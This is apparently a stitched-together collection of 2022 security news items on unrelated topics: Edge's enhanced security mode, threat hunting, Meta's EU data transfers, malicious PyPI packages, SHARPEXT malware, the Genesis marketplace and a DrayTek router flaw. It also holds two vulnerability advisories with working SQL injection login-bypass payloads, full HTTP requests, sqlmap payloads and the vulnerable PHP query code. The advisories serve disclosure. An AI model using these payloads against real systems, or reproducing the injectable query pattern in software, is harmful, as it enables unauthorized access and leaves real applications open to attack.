Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability.

CVE-2022-33649

Browser adds defense in depth to prevent abuse of unpatched vulnerabilities

Browser adds defense in depth to prevent abuse of unpatched vulnerabilities

Microsoft has introduced an optional feature to its Edge browser that applies more stringent security controls when users visit unfamiliar websites.

Enhanced security mode mitigates memory-related vulnerabilities by disabling just-in-time (JIT) JavaScript compilation, while activating additional operating system protections for the browser such as arbitrary code guard and hardware-enforced stack protection, according to Microsoft.

It said these changes provide “defense in depth” by making it harder for malicious sites to leverage unpatched vulnerabilities in order to write to executable code into memory.

RELATED Chromium site isolation bypass allows wide range of attacks on browsers

Microsoft said the provision of a “rich browsing experience using powerful technologies like JavaScript” heightens the risks of visiting malicious sites. “With enhanced security mode, Microsoft Edge helps reduce the risk of an attack by automatically applying more conservative security settings on unfamiliar sites and adapts over time as you continue to browse,” said Redmond.

**First of its kind**

Rival browsers Chrome and Firefox currently lack equivalent features, although can be configured to disable features such as JIT.

As for Safari, Apple recently announced a new security feature aimed at defending users at potential risk of highly targeted cyber-attacks that also disables JIT and other complex web technologies, unless the user excludes a trusted site. Called Lockdown Mode, this feature is designed to protect journalists, politicians, and human rights activists from spyware.

Catch up with the latest browser security news

The Microsoft Edge security team published analysis of the results of its experimentations with the new feature in August 2021 and February 2022.

The feature was rolled out in Microsoft Edge version 104, which was released August 5.

**Three levels of security**

The new feature, which is turned off by default, can be enabled as one of three modes.

In its ‘basic’ – and recommended – configuration, the feature applies “added security protection to the less visited sites”, but “preserves the user experience for the most popular sites on the web”, explained Microsoft.

Basic mode does not adapt according to user behavior. By contrast, ‘balanced’ mode “builds on user’s behavior on a particular device, and Microsoft’s understanding of risk across the web to give sites that users are most likely to use and trust full access to the web platform, while limiting what new and unfamiliar sites can do”.

Finally, the ‘strict’ setting applies enhanced safeguards universally against all sites. It isn’t recommended for most end users because of the additional configuration required for users “to complete their normal tasks”.

In all three modes, users can create exceptions for trusted websites, with enterprise admins able to create ‘allow’ and ‘deny’ lists.

Sites that use WebAssembly (WASM), a binary instruction format for stack-based virtual machines, are not currently supported by the feature. Sites that need WASM can be added to the exception site list.

An ‘added security’ banner appears in the URL navigation bar when enhanced security mode is activated for a particular site.

RECOMMENDED XSS in Gmail’s AMP For Email earns researcher $5,000

Microsoft Edge deepens defenses against malicious websites with enhanced security mode

Machine-learning algorithms alone may miss signs of a successful attack on your organization.

Zero-day attacks that exploit unpatched software vulnerabilities saw exponential growth last year. According to cybersecurity researchers like the Zero-Day Tracking Project, 2021 saw more than 80 zero-day exploits recorded, versus 36 in 2000. There are already 22 such exploits on record for the first half of 2022.

As soon as a vulnerability becomes known, cybercriminals rush to exploit it before the software developer can write, test, and release a patch. That window may be hours, but more likely days or weeks long. So, it's important that you have threat hunters — humans, not machine-learning algorithms — scouring your infrastructure proactively for signs of a successful attack.

The risk of falling victim to a zero-day attack is considerable, and the consequences real. One study from the Ponemon Institute found that 80% of successful data breaches originated with zero-day exploits. The vulnerabilities exploited are found in software common to the enterprise, including Microsoft Windows and Office, Google Chrome, Adobe Reader, Apple iOS, and Linux.

With 2021's Apache Log4j Java-based vulnerability, we can add hundreds of millions of devices and a wide range of websites, consumer and enterprise services, and applications to the list.

Step one in protecting every organization is to practice excellent IT hygiene — keep up to date on patching and updating all software. It's the back-to-basics measure that so many companies love to overlook or postpone. Granted, it can be time and resource consuming to test and deploy software patches, and the process can disrupt business operations. But it's a critical safeguard and far less costly than a data breach.

**The Invisibility of Newness**

A strong perimeter and signature-based edge controls like anti-virus software and intrusion prevention do not provide complete protection. That's because they can only detect known threats. They are blind to the footprints of zero-day attacks, when the cybercriminals are the first to uncover and exploit a software vulnerability. That's why zero-day exploit kits carry very high price tags on the black market, running from tens of thousands of dollars up to millions. They work that well.

Once a cybercriminal has used a zero-day exploit to penetrate a network unseen, they can take their time and deploy their weapon of choice, from viruses and worms to malware and ransomware to remote code execution. They can move laterally in the network, steal identities, and steal data. As long as you don't know they're there, it's like handing over the keys to the crown jewels.

**The Role of Threat Hunting**

It's that invisibility that makes proactive threat hunting an essential component of the layered approach to security. It's made possible in part because we have been smart about using machine learning to free up scarce cybersecurity people resources by reducing the number of alerts needing human intervention by 90%. Some in the industry have taken this success to mean that humans can be phased out of the security equation by algorithms, and that algorithms can do the work for us, including threat hunting.

Machine learning does bring significant advantages to cybersecurity management, but it will never completely replace humans in the security operations center. Machines handle high-volume tasks like eliminating false positives and repetitions extremely well. Machine learning may assist when you are hunting for known threats, including advanced and "low-and-slow" threats, where you know what indicators of compromise (IoCs) to look for.

However, human intelligence, intuition, strategic thinking, and creative problem solving are essential in proactive zero-day threat hunting where the IoCs are unknown and the hunter is looking for the subtle indications that another human is maliciously active in your environment.

This approach is research intensive. The analyst may create a hypothesis and then validate it based on observed patterns or anomalous activity in security data logs and user and entity behavioral analysis (UEBA) logs. According to CISA, these can include failed file modifications, increased CPU activity, inability to access files, unusual network communications, compromised administrator privileges, credentials theft, increases in database read volumes, and irregular geographical access.

Companies can develop threat hunting skills in-house or acquire them as a managed service. Either way, these human defenders and their proactive threat hunting expertise are the new elites in the security industry. Supported by comprehensive log data, threat intelligence, and tools like the MITRE ATT&CK knowledge base, human threat hunters are essential to combatting zero-day attacks, multistage attacks, and devious, low-and-slow hackers.

Human Threat Hunters Are Essential to Thwarting Zero-Day Attacks

Regulators are close to stopping Meta from sending EU data to the US, bringing a years-long privacy battle to a head.

Facebook faces trouble in Europe—and Meta wants you to know about it. Every three months since June 2018, the company has used its financial results to warn that it could be forced to stop running Facebook and Instagram across the continent—potentially pulling its apps from millions of people and thousands of businesses—if it can’t send data between the EU and the US.

Whether Meta’s bluffing will become clear soon enough.

Data regulators are on the verge of making a historic ruling in a years-long case, and they are expected to say Facebook’s data transfers across the Atlantic should be blocked. For years, Meta has fought against European privacy activists over how data is sent to the US, with courts ruling multiple times that European data isn’t properly protected and can potentially be snooped on by the NSA and other US intelligence agencies.

While the case focuses on Meta, it has widespread ramifications, potentially impacting thousands of businesses across Europe that rely upon the services of Google, Amazon, Microsoft, and more. At the same time, US and European negotiators are scrambling to finalize a long-awaited new data-sharing deal that will limit what information US intelligence agencies can get their hands on. If negotiators can’t get it right, people’s privacy will remain at risk and billions of dollars of trade will be put in jeopardy.

At the start of July, the Irish Data Protection Commission, Facebook’s main data regulator in Europe, issued a draft decision that would block Meta from sending data across the Atlantic. While the specifics of that draft decision aren’t known, if it is enacted, it could create a Facebook blackout across Europe.

Under the GDPR, Europe’s data law, countries across the continent get 30 days to scrutinize Ireland’s Meta decision and respond with any potential changes or complaints. That time is now up. A spokesperson for the Irish regulator says “some” objections have been received from a “small” number of other countries and it is working to address these. Experts say these are likely to be minor points of law, rather than overturning the entire decision.

So, how likely is it that Meta will actually pull its services from Europe? In reality, the chances are probably pretty slim. Meta has said it has “no desire” to leave the continent, going as far as publishing a blog post titled “Meta Is Absolutely Not Threatening to Leave Europe.” Europe’s 30-plus countries are a large market for Meta, and stopping services, even temporarily, could be costly. (A close comparison is when the company briefly banned news posts in Australia in early 2021, following a row with publishers.) While Meta may not leave Europe, it may have to make changes to how it stores and transfers data once the final decision from the Irish regulator is published, although there is no set timeline. It may also face a fine.

“My guess is that Meta is going to have to look at some form of geo-siloing if they want to continue to operate in the EU,” says Calli Schroeder, global privacy counsel at the Electronic Privacy Information Center, a nonprofit digital rights research organization. Schroeder, who previously worked with companies on international data transfers, says this approach could mean Meta would have to create its own servers and data centers in the EU that aren’t connected to its broader databases.

Harshvardhan Pandit, a computer science research fellow at Trinity College Dublin who is researching the GDPR, says that as data authorities are still considering Meta’s case and a final decision hasn’t been published yet, they could include several caveats or steps that Meta should take to fall in line. For instance, one recent data protection decision in Europe gave a six-month period for a company to make changes to its business.

“I think the most pragmatic solution would be for them to create the European infrastructure, like Google or Amazon, which have quite a few data centers here,” Pandit says, adding that Meta could also introduce more encryption to how it stores data and maximize how much it keeps in the EU. All these measures would be costly, though. Jack Gilbert, director and associate general counsel at Meta, says that the issue “is in the process of being resolved.” Facebook did not respond specifically to questions about its plan to respond to the Irish decision.

European officials have twice ruled that systems put in place to share data between the EU and US don’t properly protect people’s data—the complaints have been ongoing since the early 2010s. European courts ruled that international data-sharing agreements weren’t up to scratch first in 2015 and then again in July 2020, when the Privacy Shield agreement was ruled illegal.

“All that the EU is asking for when organizations transfer data to other countries is to protect that data in line with the GDPR,” says Nader Henein, a research vice president specializing in privacy and data protection at Gartner. “The issue is that laws in the US that protect the data of ‘nonresident aliens’ are woefully insufficient and make it very difficult for organizations like Facebook to comply with local law and the GDPR.”

While Meta is the focus of the most high-profile complaint, it isn’t the only company impacted by a lack of clarity on how companies in Europe can send data to the US. “The data transfer issue is not Meta-specific,” David Wehner, Meta’s chief strategy officer, said in a July earnings call. “It relates to how in general data is transferred for all US and EU companies back and forth to the US.”

The impacts of the July 2020 decision to get rid of Privacy Shield are now being felt. Since January of this year, multiple European data regulators have ruled that using Google Analytics, the company’s traffic-monitoring service for websites, falls foul of the GDPR. Danish authorities went even further: Schools can’t use Chromebooks without restrictions being put in place. “There is a ton of legal uncertainty, and there is a significant compliance risk,” says Gabriela Zanfir-Fortuna, vice president of global privacy at Future of Privacy Forum, a nonprofit think tank.

Politicians are well aware of the problems. In March, US president Joe Biden and European Commission president Ursula von der Leyen announced a new Trans-Atlantic Data Privacy Framework, which will change the way data is sent between the EU and US. The deal, which will be introduced by executive order, will limit what data US intelligence agencies can access and will create a new system where Europeans can complain if they think they’ve been illegally spied upon by US agencies.

However, since the deal was announced, no specifics—including any legal texts—have been published. In June, officials said the deal could be published in the coming weeks, but so far, there has been little public progress. The US Department of Commerce says discussions are still taking place, including a meeting between both sides last week. (A European Commission spokesperson says work on the new agreement is ongoing, but they do not have a timeline that can be shared.) The longer the negotiations take, the more blocking orders will drop. “Obviously, if that framework is not complete, we would be in jeopardy of being able to transfer data,” Facebook’s Wehner said earlier this year.

The deal is likely to take a while yet. “Realistically, at this point, we're looking at a potential adequacy decision for this Trans-Atlantic data transfers framework sometime next year—maybe the first quarter of next year,” Zanfir-Fortuna says. Once the details have been published, EU officials will spend months scrutinizing the specifics to see if they fall in line with court orders.

And they won’t be the only ones pouring over it. Privacy activists and lawyers will also be looking at the agreement and could launch further legal challenges if they find that data moving from Europe to the US still isn’t protected strongly enough. “The continued challenges are not unwarranted, particularly considering the Snowden revelations and the prevalence of Big Tech firms coming out of the US,” Schroeder says. “As a whole, America really needs to make sure we rise to the challenge of showing that we can be good stewards of the industry that we're trying to be leaders in.”

Will Europe Force a Facebook Blackout?

In what's yet another instance of malicious packages creeping into public code repositories, 10 modules have been removed from the Python Package Index (PyPI) for their ability to harvest critical data points such as passwords and Api tokens.
The packages "install info-stealers that enable attackers to steal developer's private data and personal credentials," Israeli cybersecurity firm Check

In what's yet another instance of malicious packages creeping into public code repositories, 10 modules have been removed from the Python Package Index (PyPI) for their ability to harvest critical data points such as passwords and Api tokens.

The packages "install info-stealers that enable attackers to steal developer's private data and personal credentials," Israeli cybersecurity firm Check Point said in a Monday report.

A short summary of the offending packages is below -

*   **Ascii2text**, which downloads a nefarious script that gathers passwords stored in web browsers such as Google Chrome, Microsoft Edge, Brave, Opera, and Yandex Browser
*   **Pyg-utils, Pymocks, and PyProto2**, which are designed to steal users' AWS credentials
*   **Test-async and Zlibsrc**, which download and execute malicious code during installation
*   **Free-net-vpn, Free-net-vpn2, and WINRPCexploit**, which steal user credentials and environment variables, and
*   **Browserdiv**, which are capable of collecting credentials and other information saved in the web browser's Local Storage folder

The disclosure is the latest in a rapidly ballooning list of recent cases where threat actors have published rogue software on widely used software repositories such as PyPI and Node Package Manager (NPM) with the goal of disrupting the software supply chain.

If anything, the elevated risk posed by such incidents heightens the need to review and exercise due diligence prior to downloading third-party and open source software from public repositories.

**Malicious NPM Packages Steal Discord Tokens and Bank Card Data**

Just last month, Kaspersky disclosed four libraries, viz small-sm, pern-valids, lifeculer, and proc-title, in the NPM package registry that contained highly obfuscated malicious Python and JavaScript code designed to steal Discord tokens and linked credit card information.

The campaign, dubbed LofyLife, proves how such services have proven to be a lucrative attack vector for adversaries to reach a significant number of downstream users by dressing up malware as seemingly useful libraries.

"Supply chain attacks are designed to exploit trust relationships between an organization and external parties," the researchers said. "These relationships could include partnerships, vendor relationships, or the use of third-party software."

"Cyber threat actors will compromise one organization and then move up the supply chain, taking advantage of these trusted relationships to gain access to other organizations' environments."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

10 Credential Stealing Python Libraries Found on PyPI Repository

A vulnerability was found in SourceCodester Employee Management System. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /process/aprocess.php. The manipulation of the argument mailuid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205837 was assigned to this vulnerability.

**SourceCodester Employee Management System aprocess.php SQL Injection****Vendor Homepage:**

https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html

**Source Code Download：**

https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip

**Proof of Concept**

Step 1: Open the URL http://127.0.0.1/ems/alogin.html

Step 2: Use payload admin' or 1 # in Email and anything in Password

Step 3: login success

**Malicious Request.**

    POST /ems/process/aprocess.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 40
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.47
    Referer: http://192.168.88.195/ems/alogin.html
    Accept-Encoding: gzip, deflate
    Connection: close
    
    mailuid=admin' or 1 #&pwd=123&login-submit=Login
    

**Sqlmap**

    Parameter: mailuid (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: mailuid=-6002' OR 3766=3766#&pwd=123&login-submit=Login
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: mailuid=admin' AND (SELECT 4206 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(4206=4206,1))),0x7176786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sPJa&pwd=123&login-submit=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: mailuid=admin' AND (SELECT 1085 FROM (SELECT(SLEEP(5)))gGqt)-- XrcV&pwd=123&login-submit=Login
    

**code**

/process/aprocess.php line 5-12，

    $email = $_POST['mailuid'];
    $password = $_POST['pwd'];
    
    $sql = "SELECT * from `alogin` WHERE email = '$email' AND password = '$password'";
    
    //echo "$sql";
    
    $result = mysqli_query($conn, $sql);

CVE-2022-2724: PHP代码审计—Employee Management System aprocess.php SQL Injection

A vulnerability was found in SourceCodester Employee Management System. It has been classified as critical. Affected is an unknown function of the file /process/eprocess.php. The manipulation of the argument mailuid/pwd leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205836.

**SourceCodester Employee Management System eprocess.php SQL Injection****Vendor Homepage:**

https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html

**Source Code Download：**

https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip

**Proof of Concept**

Step 1: Open the URL http://127.0.0.1/ems/elogin.html

Step 2: Use payload 1' or 1 # in Email and anything in Password

Step 3: login success

**Malicious Request.**

    POST /ems/process/eprocess.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 40
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.47
    Referer: http://192.168.88.195/ems/elogin.html
    Accept-Encoding: gzip, deflate
    Connection: close
    
    mailuid=1%27+or+1+%23&pwd=1&login-submit=Login
    

**Sqlmap**

    ---
    Parameter: mailuid (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: mailuid=-2408' OR 3144=3144#&pwd=1&login-submit=Login
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: mailuid=1' OR (SELECT 8327 FROM(SELECT COUNT(*),CONCAT(0x7171707871,(SELECT (ELT(8327=8327,1))),0x7162787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- pIQl&pwd=1&login-submit=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: mailuid=1' AND (SELECT 4704 FROM (SELECT(SLEEP(5)))vpmb)-- thNh&pwd=1&login-submit=Login
    ---
    

**code**

/process/eprocess.php line 5-12，

    $email = $_POST['mailuid'];
    $password = $_POST['pwd'];
    
    $sql = "SELECT * from `employee` WHERE email = '$email' AND password = '$password'";
    $sqlid = "SELECT id from `employee` WHERE email = '$email' AND password = '$password'";
    
    $result = mysqli_query($conn, $sql);
    $id = mysqli_query($conn , $sqlid);

CVE-2022-2723: PHP代码审计—Employee Management System eprocess.php SQL Injection

By Waqas
Researchers have warned users of Gmail on Microsoft Edge and Google Chrome browser of a new email spying…
This is a post from HackRead.com Read the original post: Hackers Using SHARPEXT Browser Malware to Spy on Gmail and Aol Users

****Researchers have warned users of Gmail on Microsoft Edge and Google Chrome browser of a new email spying malware dubbed SHARPEXT.****

**Gmail** users should watch out for the newly discovered email reading malware named SHARPEXT. It is identified by cybersecurity firm Volexity. This nosey malware spies on AOL and Google account holders and can read/download their private emails and attachments.

**Campaign Details**

SHARPEXT malware infects devices through browser extensions on Google Chrome and Chromium-based platforms, including Korean browser Naver Whale and Microsoft Edge. Its primary targets are users in the USA, South Korea, and Europe, while its origin has been traced to a North Korean hacker group called Kimsuky or SharpTongue, which is associated with the North Korean intelligence agency Reconnaissance General Bureau.

The typical targets of SHARPEXT malware include those working in nuclear weaponry. It is worth noting that **in Jun 2021**, Kimsuky APT was found targeting the South Korean atomic agency by exploiting VPN flaws. **In March 2015**, the same group was blamed for targeting South Korea’s Kori nuclear plant and leaking sensitive data on Twitter.

As for SHARPEXT; the malware can directly inspect and exfiltrate data from Gmail accounts and impact version 3.0. This campaign has been active for more than a year, and during this time, it has stolen thousands of files and messages from Gmail and AOL email accounts.

The malware is currently targeting Windows devices, but Volexity claims it may work on Linux and macOS devices too.

**How the Attack Occurs?**

The victims are lured into opening a document that contains the malware. The malware is distributed through **social engineering** and spear phishing scams.

> “Prior to deploying SHARPEXT, the attacker manually exfiltrates files required to install the extension (explained below) from the infected workstation. SHARPEXT is then manually installed by an attacker-written VBS script.”
> 
> Paul Rascagneres, Thomas Lancaster – Volexity Threat Research

According to Volexity’s **blog post**, once installed on the device, SHARPEXT malware inserts itself within the browser via the Preferences and Secure Preferences files. It then enables its email read/download capabilities. Moreover, it also hides warning alerts that may be displayed to notify the user about the presence of an unverified extension on the device.

For your information, SHARPEXT malware-laced extensions are hard to spot since there’s no such thing in it that could trigger an antivirus scanner response, and the actual threat runs from another server.

Process workflow of SHARPEXT malware (Image: Volexity)

1.  **Gmail wittingly storing your online purchase data for years**
2.  **Google vulnerability allowed sending spoofed emails with Gmail ID**
3.  **Hackers using malicious Firefox extension to phish Gmail credentials**
4.  **Popular Android Zombie game phishing users to steal Gmail credentials**
5.  **Microsoft MSHTML flaw exploited in Gmail and Instagram phishing scam**

**How to Stay Protected?**

Volexity has published a list of IoCs (indicators of compromise) on **Github** to help you identify if the device has been infected already. You may also inspect all the browser extensions installed and check if all of them can be found on Chrome Web Store.

Furthermore, Remove any extensions that look suspicious, or you downloaded from an unreliable source. Always use the best antivirus solutions to keep your device protected.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Hackers Using SHARPEXT Browser Malware to Spy on Gmail and Aol Users

As the market for initial access brokers matures, services like Genesis — which offers elite access to compromised systems and slick, professional services — are raising the bar in the underground economy.

The growing role of so-called initial access brokers (IABs) in the underground cybercrime economy is reflected in evolution of Genesis Marketplace, one of the earliest full-fledged markets for IABs, which has grown more sophisticated and polished over time.  

A report this week from Sophos takes a comprehensive look at Genesis, which started in 2017 and offers malicious actors access to other people’s data, from credentials and cookies to digital fingerprints, through its invitation-only marketplace.

Genesis currently lists more than 400,000 bots (compromised systems) in more than 200 nations, with Italy, France, and Spain topping the list of affected countries.

The market provides not just the data itself but well-maintained tools to facilitate that data's (mis)use. Those tools extend to bespoke anti-detection offerings that help its clients stay under the radar when deploying stolen credentials to access targeted bots — including a Google Chrome extension and even a "continually maintained and upgraded" Genesium browser on offer.

"Most attackers, especially less-experienced ones, do not want to waste time or effort on the reconnaissance and infiltration phases of an attack," explains Sophos threat researcher Angela Gunn. "The maturity of Genesis, both the ease of use and the serious-inquiries-only vibe that come with restricted access, speaks to not wasting time or effort."

The service is defined by the high quality level of data on offer, as well as the site's commitment to keeping stolen info up to date.

This means hackers who pay for stolen information are kept abreast by Genesis of when that information changes or gets updated. Users are charged an according rate based on the volume of information it has on the targeted bot.

"For instance, the single set of credentials that led to the June 2021 EA data breach, which famously allowed the attackers into EA’s system through the gaming giant’s Slack, were purchased on Genesis for $10," according to the report.

Genesis also offers its clientele a level of customer service and user interface (UI) polish that Sophos describes as "far from the old days of 133tsp34k and Matrix-wannabe interfaces." This includes a slick, contemporary interface, a page of frequently asked questions (FAQs), and multilingual tech support.

Returning users also have access to a dashboard with updated information about the compromised systems they've tapped into.

"The fact that Genesis actually has a customer-service function is a statement that bolsters the operation’s seriousness," Gunn points out.

**IABs Get More Professional as Demand Rises**

The evolution of Genesis points to the "growing professionalization and specialization" of the cybercrime economy, the report notes.

Ransomware groups and affiliates are assumed to be the service's most frequent customers, particularly criminals who are looking for an IAB site that gives them expedited access and faster lateral movement to their targets.

Gunn explains that the "Dark Web" — which of course is not just one thing — has been professionalizing for a while now.

"Applicant vetting, robust search, tech support, developers, and designers — that work doesn’t happen for free," she adds. "Paying for that work evidences just how high the profits are in this realm."

A high level of organization also distinguishes the Genesis market, giving malicious actors more contextual information surrounding stolen data, and allowing them greater insights into the compromised systems. This could in fact spur even more inventive attack vectors.

"For instance, a darknet manual that we found during a recent investigation suggests to other criminals that they use complementary data from Genesis for kicking victims out of their accounts if stolen credentials are no longer valid," according to the report.

This means that even if victims attempt to neutralize the threat of stolen credentials, attackers can use the complementary data to actively extort affected users.

**The Velvet Rope Treatment**

Adding to the air of exclusivity and sophistication is the service's invite-only accessibility, which has resulted in a smaller cybercrime ecosystem of fake sites promising access to Genesis and requiring gullible criminals to make a "deposit" with a credit card to access it.

In November 2021, Digital Shadows, which has been tracking IABs since 2016, reported an increase in the use of IABs among cybercriminals.

Gunn says if organizations want to avoid landing on the IAB auction block, they first must patch all vulnerabilities, keep their systems in order, and stay vigilant.

"Even if IABs are a newer development in the threat landscape, the processes of recon and infiltration are nothing new," she adds. "Organizations should have a detection strategy in place to recognize those unusual activities, but also you need to understand your network, what’s on it, what the potential attack surfaces are, and where to prioritize patching accordingly."

Genesis IAB Market Brings Polish to the Dark Web

Now-patched RCE bug impacts dozens of DrayTek Vigor router models

James Walker 05 August 2022 at 14:15 UTC

Now-patched RCE bug impacts dozens of DrayTek Vigor router models

A critical security vulnerability impacting DrayTek Vigor routers could allow unauthenticated attackers to gain full access to victim networks.

The flaw affects the Taiwanese hardware manufacturer’s popular Vigor 3910 router, along with nearly 30 other models that share the same codebase.

**200,000 exposed devices**

The DrayTek router vulnerability was discovered by researchers from Trellix, who found that by triggering a buffer overflow in the web management interface, they could take over the underlying DrayOS.

Tracked as CVE-2022-32548, the vulnerability earned a maximum CVSS score of 10, as this attack requires no authentication to achieve remote code execution (RCE).

“During our research we uncovered over 200,000 devices which have the vulnerable service currently exposed on the internet and would require no user interaction to be exploited,” Trellix security researcher Philippe Laulheret writes in a technical blog post.

**‘Complete compromise’**

Exploiting this vulnerability can lead to a complete compromise of the device and can enable a malicious actor to access internal resources of the breached networks.

Failed exploitation attempts can lead to device reboot, denial of service, and other abnormal behavior.

Read more of the latest network security news

A security advisory released yesterday (August 4) includes the full list of impacted router models.

“Our standard best practice recommendation is to always keep firmware up to date, but we recommend that you check that affected units are running at least the firmware version \[listed\],” the vendor said.

**Patch window**

As outlined in an accompanying CERT NZ advisory this week, there has been no evidence to indicate that this vulnerability has been exploited in the wild.

“However, we strongly recommend you investigate and patch any DrayTek devices on your network as soon as possible to prevent them from being compromised,” the advisory reads.

Greg Fitzgerald, co-founder of Sevco Security, said: “Identifying and patching the known routers is a must, but organizations will still be vulnerable if there are abandoned devices connected to the network that are affected.”

_The Daily Swig_ has asked the researchers if they have seen a reduction in the number of exposed devices since the fixes were pushed out. This article will be updated when fresh information comes to hand.

The Trellix team will release more details about how the vulnerability was discovered and exploited in an upcoming presentation at Hexacon in France on October 14-15.

**RECOMMENDED** Chromium site isolation bypass allows wide range of attacks on browser

Tag

#chrome